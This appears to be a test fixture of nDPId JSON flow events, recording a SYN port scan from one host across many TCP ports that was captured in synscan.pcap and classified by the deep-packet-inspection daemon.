+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsJmIAACkG+RCsEAAIQA2GNIzSFYbdUoMYAAAAAGACCAAbCQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsVkIAACsGxzCsEAAIQA2GNIzSFb7dUoMYAAAAAGACEAAS0QAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsE28AADgG\/QOsEAAIQA2GNIzSJw\/dUoMYAAAAAGACBAANgAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs68EAAC8GLbGsEAAIQA2GNIzSJQ3dUoMYAAAAAGACEAADggAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsD9gAADIGBpusEAAIQA2GNIzSDybdUoMYAAAAAGACDAAdaQAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs9s8AADsGFqOsEAAIQA2GNIzSAFTdUoMYAAAAAGACEAAoOwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsPmoAADEG2QisEAAIQA2GNIzSDtndUoMYAAAAAGACCAAhtgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsHzcAADAG+TusEAAIQA2GNIzSRkTdUoMYAAAAAGACBADuSgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsh2UAACoGlw2sEAAIQA2GNIzSwALdUoMYAAAAAGACDABsjAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsFxcAADoG91usEAAIQA2GNIzSJxrdUoMYAAAAAGACDAAFdQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsAXUAADoGDP6sEAAIQA2GNIzSFlbdUoMYAAAAAGACDAAWOQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsr+cAAC0Ga4usEAAIQA2GNIzSDGDdUoMYAAAAAGACCAAkLwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsi1sAADkGhBesEAAIQA2GNIzSC77dUoMYAAAAAGACCAAk0QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs0uIAADYGP5CsEAAIQA2GNIzTBDbdU4MZAAAAAGACDAAoVgAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsPTUAAC8G3D2sEAAIQA2GNIzTAS3dU4MZAAAAAGACEAAnXwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5EAACoGXuGsEAAIQA2GNIzTH\/XdU4MZAAAAAGACDAAMlwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsciYAADQGokysEAAIQA2GNIzTE4ndU4MZAAAAAGACBAAhAwAAAgQFtA=="} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs7U0AACoGMSWsEAAIQA2GNIzTBDDdU4MZAAAAAGACDAAoXAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsSkwAACkG1SasEAAIQA2GNIzTJpTdU4MZAAAAAGACCAAJ+AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsBAUAAC4GFm6sEAAIQA2GNIzTGW7dU4MZAAAAAGACDAATHgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs3bMAADkGMb+sEAAIQA2GNIzTB+bdU4MZAAAAAGACCAAopgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsZGUAADgGrA2sEAAIQA2GNIzTCU\/dU4MZAAAAAGACBAArPQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsU4AAACcGzfKsEAAIQA2GNIzTE7vdU4MZAAAAAGACEAAU0QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsFDQAADcG\/T6sEAAIQA2GNIzTFR3dU4MZAAAAAGACEAATbwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 